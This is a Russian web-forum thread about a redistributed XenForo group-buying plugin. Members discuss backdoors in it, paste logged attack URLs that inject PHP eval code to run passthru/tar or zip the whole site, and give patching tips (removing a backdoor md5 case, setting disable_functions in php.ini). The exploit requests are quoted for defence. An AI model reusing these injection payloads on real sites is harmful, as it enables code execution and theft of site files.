• Представленные здесь ресурсы предназначены исключительно для личного использования. Распространение строго запрещено!

При нарушении данного правила ваш аккаунт будет заблокирован вне зависимости от статуса и если у вас имеются платные повышения, то они будут аннулированы без возможности восстановления и возврата средств!

Для скачивания ресурсов, надо иметь 10 полезных сообщений и 10 симпатий или приобрести платное повышение прав стоимостью 250р.

• Рады видеть Вас на XenforoTest!

У нас Вы можете скачать:

Перед регистрацией рекомендуем ознакомиться

с Условиями скачивания определённых плагинов и Правилами форума.

Присоединяйтесь! Учите и обучайтесь!

Иконка ресурса

Плагин Esthetic Collaborative Shopping 1.1.6

Нет прав для скачивания
Дополнение для организации и проведения совместных покупок.

SOUL

АдминкА
Администратор
Симпатии
10.538
Баллы
266
Пользователь SOUL разместил новый ресурс:

Esthetic Collaborative Shopping - Дополнение для организации и проведения совместных покупок.

ZB0owPjuMcEYEJEPN

Актуально для версии 1.0.7 и выше

1. Введение
2. Требования
3. Инструкция по установке
4. Настройка дополнения

1. Введение
Дополнение Esthetic Collaborative Shopping служит для предоставления пользователям Вашего сайта возможности совершать совместные покупки(в дальнейшем СП) продуктов, объединяться в группы для получения скидок при покупке товаров в интернет-магазинах. При этом, дополнение позволяет в автоматическом...
Узнать больше об этом ресурсе...

Пелевин

Проверенный
Симпатии
25
Баллы
18
А есть ли инструкция, где искать стучалки?

SOUL

АдминкА
Администратор
Симпатии
10.538
Баллы
266
Вообще здесь об этом говорилось http://xenforotest.ru/threads/hide-...e-mnogofunkcionalnyj-i-ochen-udobnyj-xajd.14/

И ещё вот инфа попалась по этому поводу:

Форум сливается примерно такими запросами:
Код:
passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
  ["_GET"] => array(2) {
  ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
  ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
  }
  ["_POST"] => array(0) {
  }
}
Код:
RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
  ["_GET"] => array(2) {
    ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
    ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
  }
  ["_POST"] => array(0) {
  }
}
Теперь перейдем к лечению дырок на примере плагина хайда от esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:
Код:
case '54626eee0bcb90ab43c7917eb49f2344'
и удаляем вторую строку
Код:
case 'a6746afee9fa4e6e4901943d47f272bf''
либо генерируем свой md5 код и вставлем вместо этих двух. Остальное плагины латаются по аналогии.

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec

Информация отсюда: programmisty.net

MAX3000

Пользователь
Симпатии
4
Баллы
3
Вообще здесь об этом говорилось http://xenforotest.ru/threads/hide-...e-mnogofunkcionalnyj-i-ochen-udobnyj-xajd.14/

И ещё вот инфа попалась по этому поводу:

Форум сливается примерно такими запросами:
Код:
passthru() has been disabled for security reasons
Содержимое запроса
array(3) {
  ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
  ["_GET"] => array(2) {
  ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
  }
  ["_POST"] => array(0) {
  }
}
Код:
RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
Содержимое запроса
array(3) {
  ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
  ["_GET"] => array(2) {
    ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
  }
  ["_POST"] => array(0) {
  }
}
Теперь перейдем к лечению дырок на примере плагина хайда от esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:
Код:
case '54626eee0bcb90ab43c7917eb49f2344'
и удаляем вторую строку
Код:
case 'a6746afee9fa4e6e4901943d47f272bf''
либо генерируем свой md5 код и вставлем вместо этих двух. Остальное плагины латаются по аналогии.

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec

Информация отсюда:
Спасибо за детальное описание!

SOUL

АдминкА
Администратор
Симпатии
10.538
Баллы
266
А где php.ini найти можно? где он находится? примерный путь,папки.Все перерыл,найти не могу.
Нашла мануалGirl_Smile379
Для того, чтобы узнать путь, где размещается файл php.ini, нужно сделать следующее:

1) Создаем файл info.php;

2) В него помещаем следующий код: <?php phpinfo(); ?>;

3) Размещаем этот файл в корне сайта или корневой папки;

4) Запускаем этот файл, через браузер: например
Код:
http://site.ru/info.php
Вот и все, перед вами будет выведена полная конфигурация php. В строке «Loaded Configuration File» будет указан путь к вашему файлу php.ini.

kvestel

Проверенный
Симпатии
29
Баллы
18
Так я делал,указывает путь usr/local/php5/php.ini На денвере это все есть,а вот на хостинге нету.

kvestel

Проверенный
Симпатии
29
Баллы
18
А обязательно менять php.ini ? смены кодов не хватит? Мне просто хостер ответил что пользователям этот файл не доступен и сменить он не может,поскольку эта функция заблокирована в целях безопасности.

X-Oleg

Местный
Симпатии
619
Баллы
93
А обязательно менять php.ini ? смены кодов не хватит? Мне просто хостер ответил что пользователям этот файл не доступен и сменить он не может,поскольку эта функция заблокирована в целях безопасности.
Смены кодов хватит, эта опция отключает потенциально-опасные функции в php, поэтому и необязательно:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec".

Но проблема, если эти функции понадобятся то-что ? Да и сомневаюсь что это как-то защитит от бекдуров !Scratch_One_S_Head

hummer777111

Пользователь
Симпатии
6
Баллы
3
от архива пароль не подскажете?

hummer777111

Пользователь
Симпатии
6
Баллы
3
Ты его сам сможешь увидеть, когда напишешь 35 постов и получишь 7 симпатий.Girl_Smile379
уже нашел протестил и разочаровался думал хоть в
1.1.2
будет индекатор обратного отсчета времени начала (старта сбора средств как в 1,1,3) а там то же самое что и 1,0,8 :( я расстроился (

hummer777111

Пользователь
Симпатии
6
Баллы
3
уже нашел протестил и разочаровался думал хоть в
1.1.2
будет индекатор обратного отсчета времени начала (старта сбора средств как в 1,1,3) а там то же самое что и 1,0,8 :( я расстроился (
к тому-же заметил что наши модули кардинально отличаются от знаменитого сКладчика , например кнопка записаться убрано в сторону в право, даты отсчета красным цветом тоже нет , много лишней информации мешающей простым пользователям типа комиссия орга , комиссия ресурса.

SOUL

АдминкА
Администратор
Симпатии
10.538
Баллы
266
пожалуйста подскажите можно найти нам версию 1,1,3 для проверки?
Мне обещали версию 1.1.3, но, к сожалению, не все и не всегда сдерживают свои обещания.Girl_Sad38

Если мне удастся раздобыть версию 1.1.3, сразу выложу её здесь...

hummer777111

Пользователь
Симпатии
6
Баллы
3
Мне обещали версию 1.1.3, но, к сожалению, не все и не всегда сдерживают свои обещания.Girl_Sad38

Если мне удастся раздобыть версию 1.1.3, сразу выложу её здесь...
1,1,3? вауу классно!!:) как появится главное про меня не забудьте я тоже буду ждать с нетерпением великим

Последнее редактирование:

pereval103

Проверенный
Симпатии
2
Баллы
3
После выхода 1.5 бета, произошли изменения в обьявление , и данный модуль перестал отображать складчины.
Кто столкнулся с этой проблемой и как ее решить ,дабы вернуть эти обьявления.

JiM

Пользователь
Симпатии
3
Баллы
3
Прошу прощения, а это правильно, что кнопка "Скачать" в шапке поста доступна всем подряд?
Я конечно не против такой халявы, но обычно для скачивания нужно набрать хотя бы какое-то количество сообщений или лайков Ventilyator_gara

Вверх Снизу